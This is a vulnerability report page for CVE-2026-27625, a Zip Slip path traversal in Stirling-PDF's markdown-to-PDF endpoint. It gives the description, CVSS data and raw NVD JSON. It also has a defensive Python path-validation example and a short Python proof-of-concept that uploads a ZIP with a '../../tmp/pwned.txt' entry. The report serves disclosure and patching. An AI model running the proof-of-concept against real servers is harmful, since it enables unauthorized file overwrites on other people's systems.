Security Vulnerability Report
CVE-2026-27625 CVSS 8.1 HIGH

CVE-2026-27625

Published: 2026-03-20 09:16:14
Last Modified: 2026-03-24 16:03:23

Description

Stirling-PDF is a locally hosted web application that performs various operations on PDF files. In versions prior to 2.5.2, the /api/v1/convert/markdown/pdf endpoint extracts user-supplied ZIP entries without path checks. Any authenticated user can write files outside the intended temporary working directory, leading to arbitrary file write with the privileges of the Stirling-PDF process user (stirlingpdfuser). This can overwrite writable files and compromise data integrity, with further impact depending on writable paths. The issue was fixed in version 2.5.2.
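The path check the description says was missing, as an added example (not Stirling-PDF's code and not the 2.5.2 patch): every entry name is resolved against the extraction root and the whole archive is rejected if any entry lands outside it. The function names, the `work` directory and the sample archives are constructed for illustration.

```python
import io
import os
import tempfile
import zipfile

class UnsafeEntry(Exception):
    """A ZIP entry name resolves outside the extraction root."""

def resolve_entry(root: str, name: str) -> str:
    """Return the absolute write target for `name`, or raise UnsafeEntry."""
    root_real = os.path.realpath(root)
    # Treat "..\\x" like "../x"; an absolute name makes join() discard the root.
    target = os.path.realpath(os.path.join(root_real, name.replace("\\", "/")))
    # commonpath compares whole components: "work-evil" is not inside "work".
    if os.path.commonpath([root_real, target]) != root_real:
        raise UnsafeEntry(name)
    return target

def safe_extract(zip_bytes: bytes, root: str) -> list:
    """Validate every entry before writing, so a bad archive writes nothing."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        plan = [(info, resolve_entry(root, info.filename)) for info in zf.infolist()]
        written = []
        for info, target in plan:
            if info.is_dir():
                continue  # parent directories of files are created below
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(os.path.relpath(target, os.path.realpath(root)))
        return written

def build_zip(entries: dict) -> bytes:
    """Build a constructed sample archive in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, body in entries.items():
            zf.writestr(name, body)
    return buf.getvalue()

def demo() -> tuple:
    with tempfile.TemporaryDirectory() as base:
        root = os.path.join(base, "work")
        ok = safe_extract(build_zip({"doc/readme.md": "# hi"}), root)
        try:
            safe_extract(build_zip({"good.md": "ok", "../escaped.txt": "x"}), root)
            rejected = None
        except UnsafeEntry as exc:
            rejected = str(exc)
        return ok, rejected, os.path.exists(os.path.join(root, "good.md"))
```

`demo()` returns the files written from the benign archive, the entry name that caused the second archive to be refused, and whether anything from the refused archive reached disk.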

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:stirling:stirling_pdf:*:*:*:*:*:*:*:* - VULNERABLE
Stirling-PDF < 2.5.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import zipfile
import io

# Target configuration
target_url = "http://localhost:8080/api/v1/convert/markdown/pdf"
login_url = "http://localhost:8080/api/v1/auth/login"
username = "attacker"
password = "password"

# Create a requests session
session = requests.Session()

# Step 1: Authenticate to get a valid session
login_payload = {
    "username": username,
    "password": password
}
login_response = session.post(login_url, json=login_payload)
if login_response.status_code != 200:
    print("Login failed")
    exit()

# Step 2: Create a malicious ZIP file using Zip Slip technique
# This attempts to write a file outside the extraction directory
zip_buffer = io.BytesIO()
with zipfile.ZipFile(zip_buffer, 'w', zipfile.ZIP_DEFLATED) as zf:
    # The path "../../tmp/pwned.txt" tries to escape the temp folder
    zf.writestr("../../tmp/pwned.txt", "This is an arbitrary file write via CVE-2026-27625")
zip_buffer.seek(0)

# Step 3: Send the exploit payload
files = {
    'file': ('exploit.zip', zip_buffer, 'application/zip')
}
response = session.post(target_url, files=files)

print(f"Exploit sent. Status Code: {response.status_code}")
print(f"Response: {response.text}")

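References

https://github.com/Stirling-Tools/Stirling-PDF/releases/tag/v2.5.2 (Patch, Product)
https://github.com/Stirling-Tools/Stirling-PDF/security/advisories/GHSA-wccq-mg6x-2w22 (Exploit, Vendor Advisory)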

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-27625", "sourceIdentifier": "[email protected]", "published": "2026-03-20T09:16:13.857", "lastModified": "2026-03-24T16:03:23.303", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Stirling-PDF is a locally hosted web application that performs various operations on PDF files. In versions prior to 2.5.2, the /api/v1/convert/markdown/pdf endpoint extracts user-supplied ZIP entries without path checks. Any authenticated user can write files outside the intended temporary working directory, leading to arbitrary file write with the privileges of the Stirling-PDF process user (stirlingpdfuser). This can overwrite writable files and compromise data integrity, with further impact depending on writable paths. The issue was fixed in version 2.5.2."}, {"lang": "es", "value": "Stirling-PDF es una aplicación web alojada localmente que realiza diversas operaciones en archivos PDF. En versiones anteriores a la 2.5.2, el endpoint /API/v1/convert/markdown/pdf extrae entradas ZIP proporcionadas por el usuario sin comprobaciones de ruta. Cualquier usuario autenticado puede escribir archivos fuera del directorio de trabajo temporal previsto, lo que lleva a la escritura arbitraria de archivos con los privilegios del usuario del proceso de Stirling-PDF (stirlingpdfuser). Esto puede sobrescribir archivos escribibles y comprometer la integridad de los datos, con un impacto adicional dependiendo de las rutas escribibles. 
El problema se solucionó en la versión 2.5.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-23"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:stirling:stirling_pdf:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.5.2", "matchCriteriaId": "EE82913D-A442-4C18-847F-741630FC4CD0"}]}]}], "references": [{"url": "https://github.com/Stirling-Tools/Stirling-PDF/releases/tag/v2.5.2", "source": "[email protected]", "tags": ["Patch", "Product"]}, {"url": "https://github.com/Stirling-Tools/Stirling-PDF/security/advisories/GHSA-wccq-mg6x-2w22", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}